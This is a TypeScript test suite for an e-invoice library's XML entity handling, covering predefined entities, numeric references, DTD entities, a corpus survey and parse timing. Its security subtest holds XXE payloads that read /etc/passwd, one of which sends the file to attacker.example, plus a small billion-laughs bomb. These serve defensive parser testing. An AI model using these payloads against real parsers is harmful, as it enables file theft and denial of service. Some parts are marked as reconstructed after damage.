import { expect, tap } from '@git.zone/tstest/tapbundle';
import * as einvoice from '../../../ts/index.js';
import * as plugins from '../../plugins.js';
import { CorpusLoader } from '../../helpers/corpus.loader.js';
import { PerformanceTracker } from '../../helpers/performance.tracker.js';

/**
 * PARSE-09: Entity Reference Resolution.
 *
 * Exploratory suite that feeds XML containing predefined entities, numeric
 * character references, DTD-defined entities and known entity-based attack
 * payloads into `EInvoice.fromXmlString` and logs what happens. The subtests
 * are deliberately log-only: parser errors are reported, not asserted on.
 *
 * NOTE(review): this file had been damaged by an HTML-decoding / tag-stripping
 * pass (entity literals decoded in place, XML markup removed from fixtures).
 * The entity literals and fixtures below are restored to their escaped form;
 * element names inside the fixtures are a best-effort reconstruction.
 */

/** The five entity names that XML 1.0 predefines; anything else needs a DTD. */
const PREDEFINED_ENTITY_REFS = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];

/** Matches one decimal (`&#65;`) or hexadecimal (`&#x41;`) character reference. */
const NUMERIC_REFERENCE = /^&#(x[0-9A-Fa-f]+|\d+);$/;

/** Matches a named entity reference that is NOT one of the five predefined ones. */
const CUSTOM_ENTITY_REFERENCE = /&(?!(?:amp|lt|gt|quot|apos);)[A-Za-z_][\w.-]*;/;

/**
 * Turns whatever was thrown into printable text.
 * Works whether the catch variable is typed `any` or `unknown`.
 */
const describeError = (error: unknown): string =>
  error instanceof Error ? error.message : String(error);

/**
 * Decodes a single numeric character reference.
 *
 * @param ref - Text such as `&#8364;` or `&#x20AC;`.
 * @returns The referenced character, or `null` when `ref` is not a well-formed
 *   numeric reference or names a code point beyond U+10FFFF.
 */
const decodeNumericReference = (ref: string): string | null => {
  const match = NUMERIC_REFERENCE.exec(ref);
  if (match === null) {
    return null;
  }
  const digits = match[1];
  const codePoint = digits.startsWith('x')
    ? Number.parseInt(digits.slice(1), 16)
    : Number.parseInt(digits, 10);
  // String.fromCodePoint throws a RangeError above the Unicode maximum.
  if (codePoint > 0x10ffff) {
    return null;
  }
  return String.fromCodePoint(codePoint);
};

tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
  const performanceTracker = new PerformanceTracker('PARSE-09');

  await t.test('Predefined XML entities', async () => {
    performanceTracker.startOperation('predefined-entities');

    const predefinedEntities = [
      { name: 'Ampersand', entity: '&amp;', character: '&', description: 'Used in company names and text' },
      { name: 'Less than', entity: '&lt;', character: '<', description: 'Used in text content' },
      { name: 'Greater than', entity: '&gt;', character: '>', description: 'Used in text content' },
      { name: 'Quote', entity: '&quot;', character: '"', description: 'Used in attribute values' },
      { name: 'Apostrophe', entity: '&apos;', character: "'", description: 'Used in attribute values' },
    ];

    for (const entity of predefinedEntities) {
      const startTime = performance.now();

      const testXml = `<?xml version="1.0"?>
<invoice>
  <supplier>Test ${entity.entity} Company</supplier>
  <note>Text with ${entity.entity} entity</note>
</invoice>`;

      console.log(`${entity.name} entity (${entity.entity}):`);
      console.log(`  Character: "${entity.character}"`);
      console.log(`  Usage: ${entity.description}`);

      try {
        const invoice = new einvoice.EInvoice();
        if (invoice.fromXmlString) {
          await invoice.fromXmlString(testXml);
          console.log('  ✓ Entity resolved correctly');
        } else {
          console.log('  ⚠️  Cannot test without fromXmlString');
        }
      } catch (error) {
        console.log(`  ✗ Error: ${describeError(error)}`);
      }

      performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
    }

    performanceTracker.endOperation('predefined-entities');
  });

  await t.test('Numeric character references', async () => {
    performanceTracker.startOperation('numeric-entities');

    const numericTests = [
      {
        name: 'Decimal references',
        tests: [
          { ref: '&#65;', char: 'A', description: 'Latin capital A' },
          { ref: '&#8364;', char: '€', description: 'Euro sign' },
          { ref: '&#169;', char: '©', description: 'Copyright symbol' },
          { ref: '&#8482;', char: '™', description: 'Trademark symbol' },
          { ref: '&#176;', char: '°', description: 'Degree symbol' },
        ],
      },
      {
        name: 'Hexadecimal references',
        tests: [
          { ref: '&#x41;', char: 'A', description: 'Latin capital A (hex)' },
          { ref: '&#x20AC;', char: '€', description: 'Euro sign (hex)' },
          { ref: '&#xA9;', char: '©', description: 'Copyright (hex)' },
          { ref: '&#x2122;', char: '™', description: 'Trademark (hex)' },
          { ref: '&#xB0;', char: '°', description: 'Degree (hex)' },
        ],
      },
    ];

    for (const category of numericTests) {
      console.log(`\n${category.name}:`);

      for (const test of category.tests) {
        const startTime = performance.now();

        const xml = `<?xml version="1.0"?>
<invoice>
  <amount currency="${test.ref}">100.00</amount>
  <temperature>${test.ref}C</temperature>
  <copyright>${test.ref} 2024</copyright>
</invoice>`;

        console.log(`  ${test.ref} = "${test.char}" (${test.description})`);

        try {
          // Decode the reference independently of the expected character so the
          // check can actually fail; then confirm substitution leaves no
          // unresolved reference behind in the document.
          const decoded = decodeNumericReference(test.ref);
          const resolved = xml.split(test.ref).join(test.char);

          if (decoded === test.char && resolved.includes(test.char) && !resolved.includes(test.ref)) {
            console.log('    ✓ Entity would resolve correctly');
          } else {
            console.log(`    ✗ Expected "${test.char}" but reference decodes to "${decoded}"`);
          }
        } catch (error) {
          console.log(`    ✗ Resolution error: ${describeError(error)}`);
        }

        performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
      }
    }

    performanceTracker.endOperation('numeric-entities');
  });

  await t.test('Custom entity definitions (DTD)', async () => {
    performanceTracker.startOperation('custom-entities');

    const customEntityTests = [
      {
        name: 'Internal DTD entities',
        xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY company "Acme Corporation">
  <!ENTITY address "123 Main Street, London">
  <!ENTITY year "2024">
  <!ENTITY currency "EUR">
]>
<invoice>
  <supplier>&company;</supplier>
  <supplierAddress>&address;</supplierAddress>
  <date>01-01-&year;</date>
  <amount currency="&currency;">1000.00</amount>
</invoice>`,
        entities: {
          'company': 'Acme Corporation',
          'address': '123 Main Street, London',
          'year': '2024',
          'currency': 'EUR',
        },
      },
      {
        name: 'Parameter entities',
        xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY % common SYSTEM "common.dtd">
  %common;
]>
<invoice>
  <data>&company;</data>
</invoice>`,
        description: 'External parameter entities (security risk)',
      },
      {
        name: 'Nested entity references',
        xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY city "London">
  <!ENTITY country "UK">
  <!ENTITY fullAddress "&city;, &country;">
]>
<invoice>
  <address>&fullAddress;</address>
</invoice>`,
        expected: 'London, UK',
      },
    ];

    for (const test of customEntityTests) {
      const startTime = performance.now();

      console.log(`\n${test.name}:`);

      if (test.entities) {
        console.log('  Defined entities:');
        for (const [name, value] of Object.entries(test.entities)) {
          console.log(`    &${name}; = "${value}"`);
        }
      }

      if (test.description) {
        console.log(`  Note: ${test.description}`);
      }

      if (test.expected) {
        console.log(`  Expected result: ${test.expected}`);
      }

      try {
        const invoice = new einvoice.EInvoice();
        if (invoice.fromXmlString) {
          // Note: Many parsers disable DTD processing by default for security
          await invoice.fromXmlString(test.xml);
          console.log('  ✓ Parsed (DTD support may vary)');
        }
      } catch (error) {
        console.log(`  ⚠️  DTD parsing: ${describeError(error)}`);
        console.log('  Note: DTD processing often disabled for security');
      }

      performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
    }

    performanceTracker.endOperation('custom-entities');
  });

  await t.test('Entity security considerations', async () => {
    performanceTracker.startOperation('entity-security');

    // The expansion payload is kept small on purpose (10^3 copies of "lol",
    // a few kilobytes) so that a parser which DOES expand it cannot exhaust
    // memory in the test run.
    const tenfold = (name: string): string => `&${name};`.repeat(10);

    const securityTests = [
      {
        name: 'Billion laughs attack (XML bomb)',
        xml: `<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "${tenfold('lol')}">
  <!ENTITY lol3 "${tenfold('lol2')}">
  <!ENTITY lol4 "${tenfold('lol3')}">
]>
<invoice>
  <data>&lol4;</data>
</invoice>`,
        risk: 'Exponential entity expansion',
        mitigation: 'Disable DTD processing or limit entity expansion',
      },
      {
        name: 'External entity injection (XXE)',
        xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
  <data>&xxe;</data>
</invoice>`,
        risk: 'File disclosure, SSRF',
        mitigation: 'Disable external entity resolution',
      },
      {
        name: 'Parameter entity XXE',
        xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.example/?data=%file;'>">
  %eval;
  %exfil;
]>
<invoice></invoice>`,
        risk: 'Out-of-band data exfiltration',
        mitigation: 'Disable parameter entities',
      },
    ];

    for (const test of securityTests) {
      console.log(`\n${test.name}:`);
      console.log(`  Risk: ${test.risk}`);
      console.log(`  Mitigation: ${test.mitigation}`);

      const startTime = performance.now();

      try {
        const invoice = new einvoice.EInvoice();
        if (invoice.fromXmlString) {
          await invoice.fromXmlString(test.xml);
          // Reaching this line means the payload was accepted without an error.
          console.log('  ⚠️  SECURITY WARNING: Parser allowed dangerous entities!');
        }
      } catch (error) {
        console.log('  ✓ Parser correctly rejected dangerous entities');
        console.log(`    Error: ${describeError(error)}`);
      }

      performanceTracker.recordMetric('security-test', performance.now() - startTime);
    }

    performanceTracker.endOperation('entity-security');
  });

  await t.test('Entity usage in e-invoices', async () => {
    performanceTracker.startOperation('einvoice-entities');

    // `text` and `entity` hold the ESCAPED form as it would appear in XML;
    // `resolved` holds the character a conforming parser should produce.
    const einvoicePatterns = [
      {
        name: 'Currency symbols',
        examples: [
          { text: 'Price in &#8364; (EUR)', entity: '&#8364;', resolved: '€' },
          { text: 'Amount in &#163; (GBP)', entity: '&#163;', resolved: '£' },
          { text: 'Cost in &#36; (USD)', entity: '&#36;', resolved: '$' },
          { text: 'Price in &#165; (JPY)', entity: '&#165;', resolved: '¥' },
        ],
      },
      {
        name: 'Special characters in company names',
        examples: [
          { text: 'Smith &amp; Jones Ltd.', entity: '&amp;', resolved: '&' },
          { text: 'AT&amp;T Communications', entity: '&amp;', resolved: '&' },
          { text: 'L&apos;Oréal Paris', entity: '&apos;', resolved: "'" },
          { text: '&quot;Best Price&quot; Store', entity: '&quot;', resolved: '"' },
        ],
      },
      {
        name: 'Legal symbols',
        examples: [
          { text: 'Copyright &#169; 2024', entity: '&#169;', resolved: '©' },
          { text: 'Registered &#174;', entity: '&#174;', resolved: '®' },
          { text: 'Trademark &#8482;', entity: '&#8482;', resolved: '™' },
        ],
      },
      {
        name: 'Mathematical symbols',
        examples: [
          { text: 'Temperature &#177;2&#176;C', entity: '&#177;/&#176;', resolved: '±/°' },
          { text: 'Discount &#8804; 50%', entity: '&#8804;', resolved: '≤' },
          { text: 'Quantity &#215; Price', entity: '&#215;', resolved: '×' },
        ],
      },
    ];

    for (const category of einvoicePatterns) {
      console.log(`\n${category.name}:`);

      for (const example of category.examples) {
        console.log(`  "${example.text}"`);
        console.log(`    Entity: ${example.entity} → ${example.resolved}`);
      }
    }

    performanceTracker.endOperation('einvoice-entities');
  });

  await t.test('Corpus entity analysis', async () => {
    performanceTracker.startOperation('corpus-entities');

    const corpusLoader = new CorpusLoader();
    const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);

    console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);

    const entityStats = {
      total: 0,
      filesWithEntities: 0,
      predefinedEntities: new Map<string, number>(),
      numericEntities: 0,
      customEntities: 0,
      dtdFiles: 0,
    };

    const sampleSize = Math.min(100, xmlFiles.length);
    const sampledFiles = xmlFiles.slice(0, sampleSize);

    for (const file of sampledFiles) {
      entityStats.total++;

      try {
        const content = await plugins.fs.readFile(file.path, 'utf8');
        let hasEntities = false;

        // Check for predefined entities (counted once per file, per entity)
        for (const entity of PREDEFINED_ENTITY_REFS) {
          if (content.includes(entity)) {
            hasEntities = true;
            entityStats.predefinedEntities.set(
              entity,
              (entityStats.predefinedEntities.get(entity) || 0) + 1
            );
          }
        }

        // Check for numeric entities
        if (/&#\d+;|&#x[\dA-Fa-f]+;/.test(content)) {
          hasEntities = true;
          entityStats.numericEntities++;
        }

        // NOTE(review): everything from here to the end of this subtest was
        // missing from the damaged file and is reconstructed from the field
        // names of `entityStats`; confirm against version control.

        // Check for DTD
        if (content.includes('<!DOCTYPE') || content.includes('<!ENTITY')) {
          entityStats.dtdFiles++;
        }

        // Check for named references that only a DTD could define
        if (CUSTOM_ENTITY_REFERENCE.test(content)) {
          hasEntities = true;
          entityStats.customEntities++;
        }

        if (hasEntities) {
          entityStats.filesWithEntities++;
        }
      } catch (error) {
        // An unreadable corpus file should not abort the survey.
        console.log(`  Skipped ${file.path}: ${describeError(error)}`);
      }
    }

    // Avoid NaN in the percentage when the corpus is empty.
    const share = entityStats.total === 0
      ? '0.0'
      : ((entityStats.filesWithEntities / entityStats.total) * 100).toFixed(1);

    console.log('\nEntity usage statistics:');
    console.log(`  Files analyzed: ${entityStats.total}`);
    console.log(`  Files with entities: ${entityStats.filesWithEntities} (${share}%)`);
    for (const [entity, count] of entityStats.predefinedEntities) {
      console.log(`    ${entity}: ${count} files`);
    }
    console.log(`  Files with numeric references: ${entityStats.numericEntities}`);
    console.log(`  Files with custom entities: ${entityStats.customEntities}`);
    console.log(`  Files with DTD: ${entityStats.dtdFiles}`);

    performanceTracker.endOperation('corpus-entities');
  });

  // NOTE(review): the title of this subtest was lost with the truncated span;
  // it is inferred from the surviving 'entity-performance' operation name.
  await t.test('Entity resolution performance', async () => {
    performanceTracker.startOperation('entity-performance');

    // Generate XML with varying entity density
    const generateXmlWithEntities = (entityCount: number): string => {
      const fields: string[] = [];
      for (let i = 0; i < entityCount; i++) {
        fields.push(`  <field${i}>Text with &amp; entity &#8364; and &#169; symbols</field${i}>\n`);
      }
      return `<?xml version="1.0"?>\n<invoice>\n${fields.join('')}</invoice>`;
    };

    const testSizes = [10, 100, 500, 1000];

    console.log('\nEntity resolution performance:');

    for (const size of testSizes) {
      const xml = generateXmlWithEntities(size);
      const xmlSize = Buffer.byteLength(xml, 'utf8');
      const entityCount = size * 3; // 3 entities per field

      const startTime = performance.now();

      try {
        const invoice = new einvoice.EInvoice();
        if (invoice.fromXmlString) {
          await invoice.fromXmlString(xml);
        }

        const parseTime = performance.now() - startTime;
        // A zero reading from a coarse timer would otherwise print "Infinity".
        const throughput = parseTime > 0 ? (entityCount / parseTime).toFixed(1) : 'n/a';

        console.log(`  ${entityCount} entities (${(xmlSize / 1024).toFixed(1)}KB):`);
        console.log(`    Parse time: ${parseTime.toFixed(2)}ms`);
        console.log(`    Entities/ms: ${throughput}`);

        performanceTracker.recordMetric(`entities-${size}`, parseTime);
      } catch (error) {
        console.log(`  Error with ${size} entities: ${describeError(error)}`);
      }
    }

    performanceTracker.endOperation('entity-performance');
  });

  // Performance summary
  console.log('\n' + performanceTracker.getSummary());

  // Entity handling best practices
  console.log('\nEntity Reference Resolution Best Practices:');
  console.log('1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)');
  console.log('2. Support numeric character references (decimal and hex)');
  console.log('3. Be cautious with DTD processing (security risks)');
  console.log('4. Disable external entity resolution by default');
  console.log('5. Limit entity expansion depth to prevent attacks');
  console.log('6. Validate resolved content after entity expansion');
  console.log('7. Consider entity usage impact on performance');
  console.log('8. Document security settings clearly for users');
});

tap.start();